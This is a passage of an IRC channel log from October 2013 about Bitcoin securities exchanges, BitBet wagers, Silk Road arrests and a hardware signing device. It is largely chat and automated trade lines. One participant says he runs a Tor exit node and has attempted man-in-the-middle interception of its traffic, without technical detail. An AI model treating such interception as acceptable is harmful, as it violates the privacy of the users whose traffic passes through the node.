than 10k Oct 09 07:23:53 the scams Oct 09 07:23:55 anyway, im off to bed. nn & gl. Oct 09 07:24:08 True, true. Like LetsDice IPO Oct 09 07:24:08 cya Oct 09 07:24:21 Probably most of the BTC was invested by owners Oct 09 07:24:26 "invested" Oct 09 07:24:39 !jd Oct 09 07:24:39 Just-Dice stat: 1191 BTC profit, 56.1k BTC invested, 162.93 mio bets, 4.01 mio BTC wagered Oct 09 07:24:42 Just fake demand Oct 09 07:25:41 JD has 40x Coinroll's BTC wagered and like 1.25x Coinroll's profit on same house edge. Oct 09 07:25:47 Nakowa took it all **** BEGIN LOGGING AT Wed Oct 9 14:02:57 2013 Oct 09 14:15:18 So, Buttfunder is dead before I could even make money on a Bitbet for that shit. Oct 09 14:16:20 Correction, until further notice, it only stops servicing US customers and requires ID. Oct 09 14:16:34 I guess that's synonymous to dead tho Oct 09 14:18:35 Well I've had enough of all this. Off to sleep. Will probably close my PTs and the rest and only leave my loan active, perhaps. Oct 09 14:19:32 I prefer to manage only something on which I have a clear 100% responsibility on no matter what. Oct 09 14:19:44 Easier and straightforward Oct 09 14:19:56 Good night. Oct 09 14:21:08 Eh, It's taken me too long being on IRC to find the right Buttfunder joke. I'm kind of enjoying the Irony that 'Muricans that despise MPEx and MP that despises 'Muricans seem like they are going to have to get along some way. Probably in a way that involves 'Muricans learning options because MPEx ain't getting LabCoin, but still. Oct 09 14:21:24 It is Fall 2012 all over again. Oct 09 14:23:14 Diablo-D3: I wouldn't be surprised if it accelerates in the next year where even moar dispoasable exchanges pop up. Oct 09 14:29:33 It seems at this rate Meni Rosenfield will be able to raise 5KbTC capital on UsagiFunder before Thanksgiving. Oct 09 14:33:50 whee Oct 09 14:34:21 in other news : today we will have the S.NSA first product announcement. Oct 09 14:34:29 great Oct 09 14:36:24 Meni makes a lovely Musaca. Oct 09 14:39:15 every pirate ship needs a good cook ? Oct 09 15:00:45 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 09 15:04:38 mircea_popescu: Please I've been waiting on it. I have already bet on it. Only donation m blog received so far got rolled into the Yes of this: http://bitbet.us/bet/545/no-such-labs-higher-market-cap-than-s-mg/ because fuck invesitng or hedging. Let the betting begin, Oct 09 15:04:49 [HAVELOCK] [AM1] 2 @ 1.11001 = 2.22 BTC [-] Oct 09 15:05:08 BingoBoingo lolwhat a concept. Oct 09 15:06:18 mircea_popescu: I don't have enough fingers to count how many bitbets I have been nearly all of both sides. I don't know what pankkake is smoking about yall abing slective. Oct 09 15:06:42 wait srsly ?! betting with yourself ? Oct 09 15:07:41 mircea_popescu: Yes, That is the beauty of mutual betting. Betting with myself until other people in the market correct the odds as they do so well. Oct 09 15:08:39 interesting. is it productive over all these many bets ? or even been keeping track ? Oct 09 15:08:53 i guess it wouldn't take that much to cover the 1% bitbet rakes. Oct 09 15:10:14 The latest example is here where I am all of the yes and a good portion of the no. I could lose on a no, but it would be covered by http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ winnings. Oct 09 15:10:57 By here I mean and forgot to link http://bitbet.us/bet/151/st-louis-cardinals-will-win-the-2013-world/ Oct 09 15:12:06 Linking errors and mistypes are a peril, but for whom? Oct 09 15:13:40 for everyone involved Oct 09 15:13:56 BingoBoingo o right, you were doing sports picks on your blog i recall Oct 09 15:14:01 well, bitbet can certainly use more of that. Oct 09 15:15:02 mircea_popescu: Well, If the Cardinal win the World series... I can probably find some BitBets on Bowl Games. Oct 09 15:16:45 Then again I've also spoiled the line bets on forum advertised picks because I was too late. Also because fuck bookies. Oct 09 15:23:07 [HAVELOCK] [AM100] 37 @ 0.0094001 = 0.3478 BTC [-] Oct 09 15:25:27 mircea_popescu: I did sports picks on the blog, but my method is strictly just eyeballing match ups before I have the opportunity to form a real opinion. I may be a shutty method, but it has served me well. Who knows what I could achieve if only I had a monkey and a dart board. Oct 09 15:25:54 lol Oct 09 15:26:05 go to the bookies in your town, get one to back you. Oct 09 15:26:17 maybe throw in a dartboard Oct 09 15:28:12 [MPEX] [S.MPOE] 5450 @ 0.0008408 = 4.5824 BTC [-] {2} Oct 09 15:29:42 mircea_popescu: LoL, I'd have to go to Vegas... This whole Illinois and/or Missouri being the most corrupt state in the union deal. They won't allow house edges lower than the sanctioned lotto offers. And so I plan to keep doing to line betting sites what it did to that Blockbet.net place which mysteriously disappeared sometime around the NCAA basketball tournament. Oct 09 15:30:32 heh. Oct 09 15:32:19 Pretty sure I didn't kill it with basketball though. Oct 09 15:37:26 If my ever so faulty memory serves me right they lifted lines from Vegas books for the World Baseball Classic. They completely forgot the part where the house vig was supposed to cover their trouble and not be a contributing factor to money they would bleed when the serious gamblers caught them in the ncaa tournament. Oct 09 15:38:20 I file the incident under reasons I don't buy mining equipment. Oct 09 15:40:52 lol Oct 09 15:41:19 so basically wait wait just a second here. Oct 09 15:41:32 are you saying the site FAKED its supposed bust, because it was betting its own book and lost ? Oct 09 15:44:57 mircea_popescu: Honestly that is how I think Blockbet.net went down. Oct 09 15:45:25 wow. Oct 09 15:45:44 add another reason to "why not use random line betting btc site sprouted after last week's rain" Oct 09 15:45:58 i did think the "bust" was a little suspicious. Oct 09 15:46:10 If I were into Bitcoin both earlier and stupider I can't say I wouldn't have tried something similar, but GPG contacts and all Oct 09 15:50:20 If dorks ever realized how much power they could get from simply having old, long GPG keys... Oct 09 15:55:54 I also ripped into solar wind mining again, because it is their fault http://www.thedrinkingrecord.com/2013/10/09/a-sample-gpg-signature/ Oct 09 15:57:41 [MPEX] [S.MPOE] 13400 @ 0.0008476 = 11.3578 BTC [+] {6} Oct 09 16:01:03 http://www.forbes.com/sites/kashmirhill/2013/10/07/the-nsas-hugely-expensive-utah-data-center-has-major-electrical-problems-and-basically-isnt-working/ Oct 09 16:01:03 The NSA's Hugely Expensive Utah Data Center Has Major Electrical Problems And Basically Isn't Workin Oct 09 16:03:20 Who would have anticipated giant Faraday cages could also be giant antennas? Oct 09 16:05:50 Also apparently Google has been hiding their GPG wizardry this whole time: https://services.google.com/corporate/publickey.txt Oct 09 16:08:45 .d Oct 09 16:08:45 189281249.28103 | Next Diff in 1517 blocks | Estimated Change: 17.4643% in 8d 16h 39m 31s Oct 09 16:08:57 bitesak lmao Oct 09 16:09:17 BingoBoingo that's not new by any means. Oct 09 16:11:11 mircea_popescu: Maybe not to you, but I've been wondering why the gmail address I dump all my ciphertext to isn't getting cipher text in my notifications from them. Oct 09 16:11:55 a well. dif story :) Oct 09 16:12:59 so basically the nsa has created the world's largest bug zapper Oct 09 16:13:04 mircea_popescu: Aren't they all. Except that pointless and whitless one? Oct 09 16:13:05 and is using it on its own techs Oct 09 16:13:09 bugs that they are. Oct 09 16:13:10 superb. Oct 09 16:13:20 if nsa repurposed the DC to bitcoin mining, no wonder Oct 09 16:13:49 I'm just wondering how much data their zapper lst that they actually wanted. Oct 09 16:15:43 Like Tor I imagine it wasn't all of it, but enough of it to clear two or three people. Oct 09 16:17:56 I've seen yesterday's posts about random wanabee deaers getting busted. I wanted to make a post about retain a fucking lawyer now. Everystory I read about actual Silk Road people involve to much stupid though. Oct 09 16:18:31 why retain a lawyer when you can just sell a bunch of coke instead? Oct 09 16:19:34 nubbins`: Case you can get a lawyer to just make bail for cheap. Then if you get busted have the good one keep you out of jail. Oct 09 16:19:48 i was joking :( Oct 09 16:20:03 [HAVELOCK] [AM1] 2 @ 1.11001 = 2.22 BTC [-] Oct 09 16:20:20 i know a guy who got busted a couple of years ago Oct 09 16:20:21 nubbins`: This is IRC everyone is joking, or incredibly serious. Oct 09 16:20:26 he didn't retain a lawyer Oct 09 16:20:40 and now he's not allowed to drink, do drugs, or leave his house Oct 09 16:21:05 [HAVELOCK] [AM100] 10 @ 0.011 = 0.11 BTC [+] Oct 09 16:21:55 nubbins`: Fuck him them. My drive through law trick must be a miracle man then (and this is the dude I didn't trust beyond making my bail). Oct 09 16:24:07 [HAVELOCK] [AM1] 1 @ 1.11001 BTC [-] Oct 09 16:24:36 Have any of yall been on TradeFortress's network CoinChat, because I am running out of ways to call RealSolid and scammy fuck and Mcxnow something to avoid at all costs. Oct 09 16:25:08 somehow I feel the next announcement on s.NSA will inspire more than the bug zapper NSA story Oct 09 16:26:33 BingoBoingo http://trilema.com/2012/why-its-not-actually-in-your-best-interest-to-allow-a-hired-third-party-to-speak-for-you-in-criminal-proceedings/ Oct 09 16:26:36 best learn teh law. Oct 09 16:27:04 mircea_popescu, have you stopped using twitter for mpex feed ? seems last trade was in june Oct 09 16:27:06 https://twitter.com/MPEx1 Oct 09 16:27:07 thank you mircea_popescu Oct 09 16:27:07 MPEx (MPEx1) on Twitter Oct 09 16:28:02 bitesak: all of the payment addresses to yes on this bet http://bitbet.us/bet/545/no-such-labs-higher-market-cap-than-s-mg/ actually go to me. Oct 09 16:29:47 bitesak: i've got a twit feed going @bitotter Oct 09 16:30:39 thanks Oct 09 16:32:15 BingoBoingo, you mean in the sense you are taking care of the NO side and will reap the YES? Oct 09 16:33:28 bitesake: That is what I have set up now. I am th only yes on that bet, and I could win it simply in the week after IPO. Oct 09 16:35:52 bitesak twitter basically decided i'm spamming them Oct 09 16:36:08 i had been trying to get it "sorted out" but they're kind of unhelpful so... what can i do. Oct 09 16:37:11 bitesak: Let us not forget this gem I sextupled my money on http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ by having simply identified in December Erik was too unreliable to spearhead a public asset backed by a GPG signed contract. For every other bet it is just the same sort of eyeballin' Oct 09 16:40:20 how does that compare to buying shares in S.Bitbet and S.NSA rather than the bitbet venue as the depth seems way bigger the S. way Oct 09 16:40:44 mircea_popescu: Aparently some other asshole has a twitter account in the name BingoBoingo, so I'll have to settle for BingoBlog or something when I get to it. Oct 09 16:41:16 it's not such a great name anyway Oct 09 16:41:23 (contrary to what you may think) Oct 09 16:41:41 bitesak: No particular way other than a gambler. If people want to hedge fuck them because I'm gambling this shit. Oct 09 16:42:46 mircea_popescu: Nothing apparently is a good enough name to break some brain wallets. Oct 09 16:43:09 :p Oct 09 16:47:09 http://www.extremetech.com/extreme/166580-researchers-find-new-ultra-low-level-method-of-hacking-cpus-and-theres-no-way-to-detect-it Oct 09 16:47:12 Researchers find new, ultra-low-level method of hacking CPUs – and there’s no way to detect it | Oct 09 16:47:15 asciilifeform for your lolz ^ Oct 09 16:51:33 [MPEX] [S.MPOE] 2500 @ 0.00084947 = 2.1237 BTC [+] Oct 09 16:51:50 mircea_popescu: It apparently seems that Tor exits have to be honeypots. I've been running on for half of a week and been getting nothing but boring througn MITM attacks. No matter what bandwidth I offer Tor exits, the tor seems to adapt n a way that either recognizes me attacking its exits or suggests it is sucking some NSA dick. Oct 09 16:54:36 [HAVELOCK] [AM100] 72 @ 0.011 = 0.792 BTC [+] {2} Oct 09 16:54:37 [HAVELOCK] [CFIG] 1 @ 0.1010375 BTC [-] Oct 09 16:55:37 [HAVELOCK] [CFIG] 6 @ 0.1005001 = 0.603 BTC [-] Oct 09 16:58:40 [HAVELOCK] [DEALCO] 24 @ 0.007 = 0.168 BTC [+] Oct 09 16:58:43 Maybe the next few days will offer something else, but so far I'm finding little more than Iranians who would probably rather the US get their story if only it wasn't so boring. Oct 09 17:00:13 .d Oct 09 17:00:13 189281249.28103 | Next Diff in 1513 blocks | Estimated Change: 17.2608% in 8d 16h 27m 18s Oct 09 17:09:29 I mean how wide does the "tor foundation" advertise their exit bandwidth being? There is not way I get all of the fringe cases exiting and nothing else if this shit ain't random. I'm probably burning some logs and just advertising Tor as more compromised than imagined. Oct 09 17:18:44 ;;later tell bingoboingo maybe do a full study of the matter and publish the results. Oct 09 17:18:45 The operation succeeded. Oct 09 17:21:02 [HAVELOCK] [AM100] 37 @ 0.011 = 0.407 BTC [-] Oct 09 17:31:59 sweet! doing a zine workshop next tuesday Oct 09 17:48:30 [MPEX] [S.MPOE] 2000 @ 0.0008474 = 1.6948 BTC [-] Oct 09 17:48:30 [HAVELOCK] [VTX] 1 @ 0.36101001 BTC [-] Oct 09 18:05:47 [HAVELOCK] [AM1] 1 @ 1.2759999 BTC [+] Oct 09 18:06:47 [MPEX] [S.MPOE] 2300 @ 0.000849 = 1.9527 BTC [+] Oct 09 18:14:55 [HAVELOCK] [AM1] 4 @ 1.2759999 = 5.104 BTC [+] Oct 09 18:31:11 [MPEX] [S.MPOE] 2612 @ 0.00084947 = 2.2188 BTC [+] Oct 09 18:41:21 [HAVELOCK] [AM100] 51 @ 0.01100001 = 0.561 BTC [-] Oct 09 18:42:22 [HAVELOCK] [AM100] 26 @ 0.011 = 0.286 BTC [-] Oct 09 18:44:24 [HAVELOCK] [AM100] 16 @ 0.01000003 = 0.16 BTC [-] Oct 09 18:50:30 [MPEX] [S.MPOE] 15953 @ 0.00085049 = 13.5679 BTC [+] {5} Oct 09 19:00:41 [HAVELOCK] [CBTC] 3325 @ 0.000183 = 0.6085 BTC [-] Oct 09 19:13:53 [HAVELOCK] [CBTC] 10694 @ 0.000183 = 1.957 BTC [-] Oct 09 19:16:23 http://www.techdirt.com/articles/20131008/18300324805/london-police-order-registrars-to-shut-down-bunch-websites-without-any-legal-basis-threaten-registrars-if-they-dont-comply.shtml Oct 09 19:16:24 London Police Order Registrars To Shut Down A Bunch Of Websites Without Any Legal Basis; Threaten Re Oct 09 19:18:43 wow Oct 09 19:21:38 conspiracy to defraud seems like an extremely large concept Oct 09 19:22:02 bitcoin is a pretty large concept Oct 09 19:23:02 [HAVELOCK] [AM1] 6 @ 1.275999 = 7.656 BTC [-] Oct 09 19:25:53 easydns claims to be a NSA-Free Zone :) and actually seems to be standing up to this farce Oct 09 19:30:00 on the bright side, all this inspires the likes of MP & co to develop S.NSA products Oct 09 19:34:14 [HAVELOCK] [AM1] 1 @ 1.12 BTC [-] Oct 09 19:35:14 [HAVELOCK] [AM1] 13 @ 1.10230769 = 14.33 BTC [-] {2} Oct 09 19:40:19 [HAVELOCK] [AM1] 5 @ 1.085 = 5.425 BTC [-] Oct 09 19:44:23 [HAVELOCK] [AM1] 4 @ 1.060001 = 4.24 BTC [-] Oct 09 19:50:29 [HAVELOCK] [AM100] 29 @ 0.01118 = 0.3242 BTC [-] Oct 09 19:54:32 [HAVELOCK] [AM100] 15 @ 0.01000268 = 0.15 BTC [-] {2} Oct 09 19:57:51 joke's on you if S.NSA products have backdoors Oct 09 20:04:42 [HAVELOCK] [AM100] 40 @ 0.01 = 0.4 BTC [-] {3} Oct 09 20:14:52 [HAVELOCK] [AM100] 20 @ 0.01000001 = 0.2 BTC [+] Oct 09 20:20:58 [HAVELOCK] [AM100] 20 @ 0.01 = 0.2 BTC [-] {2} Oct 09 20:28:22 <_mjoiii> Guys a plea for help... Oct 09 20:28:49 <_mjoiii> Anyone know of a method for tracking the transfers to Havelock? Oct 09 20:29:18 tracking tranfers ? Oct 09 20:29:21 <_mjoiii> The lack of liquidity there is killing me and I don't see any improvement after recent news. Oct 09 20:29:47 <_mjoiii> Won't us traders be transferring shares there? Oct 09 20:29:57 quite possibly Oct 09 20:30:19 <_mjoiii> Not 1:1 tacking but just an indication of the progress Oct 09 20:30:39 to initiate share transfer, follow the instructions for the specific assets Oct 09 20:30:50 we arent doing any transfers automatically Oct 09 20:31:31 <_mjoiii> No no not me, I've been w Havelock all along and happy to have a Canadian option. Just can't buy or sell much without affecting prices. Oct 09 20:32:15 <_mjoiii> So really looking forward to having more company there. Oct 09 20:33:10 [MPEX] [S.MPOE] 637 @ 0.00085195 = 0.5427 BTC [+] Oct 09 20:36:39 _mjoiii: are you trying to buy or sell? ;) Oct 09 20:38:43 <_mjoiii> Both generally, today thinking of selling some neobee. Oct 09 20:39:18 <_mjoiii> Take look at that book. Sell 2t and it drops to 0.001 Oct 09 20:39:28 <_mjoiii> Sorry, 25 Oct 09 20:40:17 [HAVELOCK] [AM100] 40 @ 0.01 = 0.4 BTC [-] {2} Oct 09 20:40:52 yeah, volume is the problem with anything btc-related Oct 09 20:41:23 only two funds have a 7-day volume > 100 btc Oct 09 20:42:00 i suppose people coming over from bitfunder & btctctctctctc will change that somewhat Oct 09 20:43:09 <_mjoiii> That is my hope too. Oct 09 20:44:09 Don't expect too much change Oct 09 20:44:22 the factbeing that people are moving assets Oct 09 20:44:24 not coins Oct 09 20:44:24 <_mjoiii> Why not? Oct 09 20:44:46 this is a turtle market Oct 09 20:44:53 "buttfunder & btctctctctctc" - sounds like some strip joint Oct 09 20:45:33 i always get confused as to what letter it ends on Oct 09 20:45:44 their fault for putting half the name in the tld Oct 09 20:45:59 yeah its extra confusing Oct 09 20:46:24 so now that we caught up on processing all the migration data, we encountered a technical limitation with Bitfunder and we will have to require ALL TAT.ASICMINER migrators from BTCT to resubmit their info using a Havelock account Oct 09 20:46:39 oof Oct 09 20:46:40 will you still be doing passthroughs? Oct 09 20:47:37 we haven't made any hard decisions in that regard Oct 09 20:47:50 we have a decision tree we have to climb through Oct 09 20:48:09 which requires meetings with various parties about various nuances Oct 09 20:48:21 there's no simple way to proceed Oct 09 20:48:50 i guess that comes with diligence Oct 09 20:48:53 in the meantime the immediate issues are the shareholders in limbo, and dividends Oct 09 20:49:17 i have no problem saying that Bitfunder has not made this easy Oct 09 20:49:44 whereas Havelock has Oct 09 20:50:00 Want to play bitcoin? Step 1: Move out of US. Step 2: Done. Oct 09 20:50:14 it's not even that simple Oct 09 20:50:27 but that's within the decision tree Oct 09 20:50:29 :) Oct 09 20:51:09 we've been working hard behind the scenes to legitimize our role into a real bitcoin investment bank Oct 09 20:51:30 we have a plan we've been executing Oct 09 20:51:40 but it does sorta require exchanges to do the same Oct 09 20:53:37 Does "we" include Neo? Oct 09 20:53:54 Or LMB Oct 09 20:55:29 ThickAsThieves: "turtle market"? As in "turtles all the way down"? Oct 09 20:55:44 we is me, my partner, our team, and our lawyers Oct 09 20:56:09 turtle as in, hiding in its shell Oct 09 20:56:23 i figure "bear" market isnt quite fitting Oct 09 20:56:40 Ah. Ok. Oct 09 20:56:45 Nope. Still don't get it. Oct 09 20:57:01 what do turtles do when they are scared? Oct 09 20:57:07 shrink into their shell Oct 09 20:57:22 Yes Oct 09 20:57:31 dont dwell on it too much Oct 09 20:57:34 ;) Oct 09 20:57:51 I think I get it now. Maybe. Back to work for me. :) Oct 09 21:09:53 you think people would invest in webproperties from flippa Oct 09 21:11:04 in wha? Oct 09 21:11:30 anything Oct 09 21:11:37 anything that is a good price Oct 09 21:11:41 and has income Oct 09 21:11:53 let me find an example Oct 09 21:12:04 <_mjoiii> Does that mean websites? Oct 09 21:12:12 yes Oct 09 21:12:15 a fund to buy websites Oct 09 21:12:25 active websites Oct 09 21:12:39 https://flippa.com/2978742-pr-3-affiliate-reviews-site-for-as-seen-on-tv-products-2k-month-profit Oct 09 21:12:40 yourenotstupid.com - Website for Sale on Flippa: PR 3 Affiliate Reviews Site for As Seen On TV Produ Oct 09 21:12:42 like that for example Oct 09 21:15:05 <_mjoiii> Is the idea to bundle profitable sites and sell units? Oct 09 21:17:47 no the idea is to run the sites Oct 09 21:17:53 and pay out a dividen Oct 09 21:20:41 that site brings in 2k a month? Oct 09 21:21:35 2k page views [via bots] Oct 09 21:21:37 :> Oct 09 21:21:51 dollars Oct 09 21:22:01 its an example Oct 09 21:22:07 i wouldnt invest in that Oct 09 21:23:53 which would you invest in? Oct 09 21:24:37 <_mjoiii> Would be interesting to see portfolio/projections. Oct 09 21:25:01 [HAVELOCK] [NEOBEE] 138 @ 0.002 = 0.276 BTC [-] Oct 09 21:25:20 so basically flippa is website templates pretending to be businesses Oct 09 21:25:49 it is affiliate websites that have stopped being profitable for their owners. Oct 09 21:25:53 <_mjoiii> Except those that are monetized and apparently profitable. Oct 09 21:25:57 who are now trying to make one last buck off them. Oct 09 21:26:11 pretty much Oct 09 21:26:16 its buying toxic websites Oct 09 21:27:13 <_mjoiii> Wondered about that in the past. If their sales pitch is correct, why are they selling? Oct 09 21:28:04 [MPEX] [S.MPOE] 8100 @ 0.00085206 = 6.9017 BTC [+] {2} Oct 09 21:29:41 it's a tricky area, as i myself have been in a position before of having profitable things i no longer wanted Oct 09 21:29:58 sometimes people just wanna move on Oct 09 21:30:09 or make better money on other things Oct 09 21:41:17 "Keith, the very first guy Sean's Outpost fed with Bitcoin Died last night" Oct 09 21:41:27 that's some headline Oct 09 21:44:19 [HAVELOCK] [B] [XBOND] 370 @ 0.001161 = 0.4296 BTC [+] {2} Oct 09 21:44:22 conclusion: don't eat Bitcoins Oct 09 21:45:20 [MPEX] [S.MPOE] 544 @ 0.00085209 = 0.4635 BTC [+] Oct 09 21:45:21 [HAVELOCK] [NEOBEE] 98 @ 0.00199 = 0.195 BTC [-] Oct 09 21:49:35 "Ulbricht's public defender said Ulbricht would not protest his detention as he awaits his transfer to New York. He retains the right to pursue bail after he arrives in New York." Oct 09 21:49:40 public defender? Oct 09 21:49:48 the thot plickens Oct 09 21:50:04 Jeeze man. Oct 09 21:50:13 Crack that wallet and get some representation. Oct 09 21:50:57 if impossible he could probably easily raise funds for his defense. weird Oct 09 22:04:40 [MPEX] [S.MPOE] 2950 @ 0.0008511 = 2.5107 BTC [-] Oct 09 22:07:43 [HAVELOCK] [AM100] 61 @ 0.010002 = 0.6101 BTC [-] Oct 09 22:14:49 [HAVELOCK] [AM1] 1 @ 1.0589 BTC [-] Oct 09 22:29:03 [MPEX] [S.MPOE] 3800 @ 0.00084995 = 3.2298 BTC [-] {3} Oct 09 22:34:09 [HAVELOCK] [AM1] 7 @ 1.01575714 = 7.1103 BTC [-] {4} Oct 09 22:34:10 [MPEX] [S.MPOE] 3500 @ 0.00085209 = 2.9823 BTC [+] {2} Oct 09 22:35:10 [HAVELOCK] [AM1] 4 @ 0.95775 = 3.831 BTC [-] {2} Oct 09 22:47:22 [HAVELOCK] [AM100] 16 @ 0.0100021 = 0.16 BTC [+] Oct 09 22:51:26 [HAVELOCK] [NEOBEE] 98 @ 0.00207 = 0.2029 BTC [+] Oct 09 22:53:28 [HAVELOCK] [AM1] 1 @ 0.951 BTC [-] Oct 09 23:00:35 [HAVELOCK] [AM1] [PAID] 32.48744832 BTC to 6`684 shares, 486048 satoshi per share Oct 09 23:06:41 [MPEX] [S.MPOE] 487 @ 0.0008521 = 0.415 BTC [+] Oct 09 23:13:48 [HAVELOCK] [AM1] 10 @ 0.92476999 = 9.2477 BTC [-] {6} Oct 09 23:15:50 [HAVELOCK] [AM100] 10 @ 0.01117 = 0.1117 BTC [+] Oct 09 23:23:57 [MPEX] [S.MPOE] 900 @ 0.0008521 = 0.7669 BTC [+] Oct 09 23:50:23 [HAVELOCK] [B] [XBOND] 1004 @ 0.00118994 = 1.1947 BTC [+] {5} Oct 10 00:02:35 [HAVELOCK] [AM100] 53 @ 0.0100021 = 0.5301 BTC [-] Oct 10 00:04:37 [HAVELOCK] [CFIG] 54 @ 0.09661668 = 5.2173 BTC [-] {4} Oct 10 00:05:38 [HAVELOCK] [AM100] 695 @ 0.00963942 = 6.6994 BTC [-] {18} Oct 10 00:14:02 Meni Rosenfeld. has a new thing Oct 10 00:14:09 http://bitblu.com/ Oct 10 00:14:10 Bitblu - crypto investment management Oct 10 00:14:40 and ripple guy Oct 10 00:15:34 from https://bitcointalk.org/index.php?topic=308581.0 Oct 10 00:18:19 wait they have a job offer for a third "founder and c?o" lol Oct 10 00:18:53 hrm Oct 10 00:19:36 lol good one Oct 10 00:20:22 i bet the salary = you get to be a founder! Oct 10 00:20:37 is that the ceo salary ? Oct 10 00:21:36 sometimes it looks like every aluminum siding, vacuum & bible and car salesman is now doing bitcoin. Oct 10 00:22:20 you'll get a kick out of the headshots for the vegas conference Oct 10 00:23:11 http://www.mediabistro.com/insidebitcoins/speakers.asp Oct 10 00:23:23 if they get shot in the head they won't be able to have open casket funerals. Oct 10 00:25:37 The vision of bitcoin is going to be set at conferences like this. Oct 10 00:25:37 —Alan Safahi of ZipZap tells The Wall Street Journal. Oct 10 00:26:01 lmao. jerkoffs will jerkoff. Oct 10 00:26:28 also, zipzap = ziggap or zipzap = clueless fuckwits who have no idea history exists ? Oct 10 00:26:30 circlederp Oct 10 00:26:59 Scrat dude, the "vision". the vision matters! herpes! Oct 10 00:27:07 "More bad luck! My power supply just died! I highly recommend not buying this power supply! http://www.newegg.com/Product/Produc...82E16817152044 Oct 10 00:27:08 Off to the store to hopefully find one that isn't an arm and a leg on such short notice." Oct 10 00:27:21 KNC Supernova Oct 10 00:27:33 supernova. nice name. Oct 10 00:27:39 lool Oct 10 00:27:45 Ty ty Oct 10 00:27:54 zipzap is this it seems http://www.zipzapinc.com/ Oct 10 00:28:09 dunno how is it related to btc Oct 10 00:28:37 so here it is : Oct 10 00:28:38 http://trilema.com/2013/snsa-first-product-the-cardano/ Oct 10 00:28:39 S.NSA first product - The Cardano pe Trilema - Un blog de Mircea Popescu. Oct 10 00:29:32 also, mpex deposits flushed if anyone was waiting. Oct 10 00:30:45 if only my internets worked Oct 10 00:30:51 i could read trilema Oct 10 00:30:57 well, get a government that's not shutdown Oct 10 00:31:02 then maybe your internets'd work. Oct 10 00:32:41 yes, the government runs the internetz Oct 10 00:33:18 everything, outdoor monuments, the internets, rain... Oct 10 00:33:40 haha Oct 10 00:33:40 best & biggest government in teh whole world! real power rangers those people. Oct 10 00:33:43 the fuckin Ocean Oct 10 00:34:11 The USG is spending more money trying to prove that the "shutdown" is a big deal. Oct 10 00:34:31 pls to not suggest the govt doth not help and doth not matter, Oct 10 00:34:38 or it's the booby hatch for you. Oct 10 00:35:07 [MPEX] [S.MPOE] 4258 @ 0.00084941 = 3.6168 BTC [-] {3} Oct 10 00:35:29 I wasn't suggesting that at all. Oct 10 00:35:35 But the booby hatch sounds nice. Oct 10 00:35:47 that's because you don't know what a boobie is. Oct 10 00:35:55 I... I thought I did... Oct 10 00:36:17 what's the target cost for the cardano? Oct 10 00:36:19 it's a... bird. Oct 10 00:36:23 midnightmagic mike_c MiningBuddy- mircea_popescu mius mixdio Oct 10 00:36:26 mike_c tba :) Oct 10 00:36:32 Yes, and a breast. Oct 10 00:36:39 Of, possibly, a female. Oct 10 00:36:48 i miss the option of forcing my own key innit Oct 10 00:37:49 kakobrekla yup Oct 10 00:38:08 the 0 1 8 problem. if you can so can someone else. no good. Oct 10 00:39:11 [MPEX] [S.MPOE] 1500 @ 0.00084933 = 1.274 BTC [-] Oct 10 00:39:34 0 1 8? Oct 10 00:40:07 ;;google zero one infinity Oct 10 00:40:08 Zero one infinity rule - Wikipedia, the free encyclopedia: ; Zero One Infinity Rule: ; Zero-One-Infinity Rule - Catb.org: Oct 10 00:42:43 id live with the fact someone can replace it Oct 10 00:42:45 but not read it Oct 10 00:43:32 why's your key so great you want to keep it anyway ? i bet you it wasn't gen'd on hardware rngs for instance. Oct 10 00:45:32 its not that i want to keep it Oct 10 00:45:37 i just want to define it Oct 10 00:45:45 but whay ? Oct 10 00:45:57 so i can keep it! Oct 10 00:46:00 he meant defile it Oct 10 00:46:05 0 1 ∞ Oct 10 00:46:15 you mean keep it as in backup it ? Oct 10 00:46:16 So he can keep using it/store it/transfer it to a replacement device Oct 10 00:46:23 Assuming he got an offline backup Oct 10 00:46:41 one problem i see with this directly is that people will keep insecure copies and then go "o noes someone hacked my cardano and stole my key!11" Oct 10 00:46:48 And keep the Cardano while on the move Oct 10 00:47:05 i think the better solution is to use a master and sign a cardano for the move. Oct 10 00:47:09 my copy is on paper and on a safe place Oct 10 00:47:21 sorta use the cardano as a subbie in that context. Oct 10 00:47:28 and i want to keep that backup Oct 10 00:47:34 What if the master cardano breaks? Oct 10 00:47:35 kakobrekla well i didn't mean you. i meant people! Oct 10 00:47:43 You're kind of screwed Oct 10 00:47:46 Namworld master doesn't have to be a cardano necessarily. Oct 10 00:47:53 True Oct 10 00:48:07 it can be, sure, but if you don't trust it you can just use it as a sub to your main key which you keep traditionally. Oct 10 00:48:10 Well I suppose that could work Oct 10 00:48:15 Definitly Oct 10 00:48:34 yet you cant use it for mpex if you dont have main key Oct 10 00:48:43 except if you reg a new key Oct 10 00:48:45 you can as long as you reg it there. Oct 10 00:48:58 which is 'disposable' Oct 10 00:49:03 which sux Oct 10 00:49:11 hm ? Oct 10 00:49:41 no way to have backup to mpex acc then Oct 10 00:49:43 If the cardano breaks, you're out of shares and need to pay for a new account. Oct 10 00:49:44 if the device breaks Oct 10 00:49:47 No backups Oct 10 00:51:14 well yes, using a device of this type for that purpose seems like you're asking for trouble. Oct 10 00:51:20 the cardano should backup the private key to the cloud. Oct 10 00:51:24 (kidding) Oct 10 00:51:26 lol Oct 10 00:51:37 sorta like carrying cats in your pant pocket Oct 10 00:52:28 anyway, we'll get a better idea as to how reliable the things are after they've been in the wild a year or two. atm all i can say is they should be pretty reliable. Oct 10 00:52:47 prp? Oct 10 00:53:26 yeah its a serious device for serious security but its so serious you cant have backups and so its not usable for serious stuff. Oct 10 00:53:35 :p Oct 10 00:53:45 it's so secret you can't have backups. Oct 10 00:54:05 this is a frontline itam. you go into enemy territory with it. Oct 10 00:54:12 still.. a straight up better replacement for securID? Oct 10 00:54:16 midnightmagic mike_c MiningBuddy- mircea_popescu mius mixdio Oct 10 00:54:20 mike_c i think so. Oct 10 00:54:27 also much better scp than scp. Oct 10 00:54:34 also much better 2fa. Oct 10 00:54:54 i like the faraday cage bit Oct 10 00:55:11 in principle you could design your garage door/house door to take a usb stick Oct 10 00:55:19 and just open them with a purpose cardano. Oct 10 00:55:26 a thin lead case perhaps, so one can be sure it's in ones pocket Oct 10 00:55:42 whiuch, even if someome smacks you over the head, can't be cloned Oct 10 00:55:44 because no backup Oct 10 00:55:59 so they just terminate you on spot Oct 10 00:56:04 without giving you a chance! Oct 10 00:56:06 pft! Oct 10 00:56:11 carry a 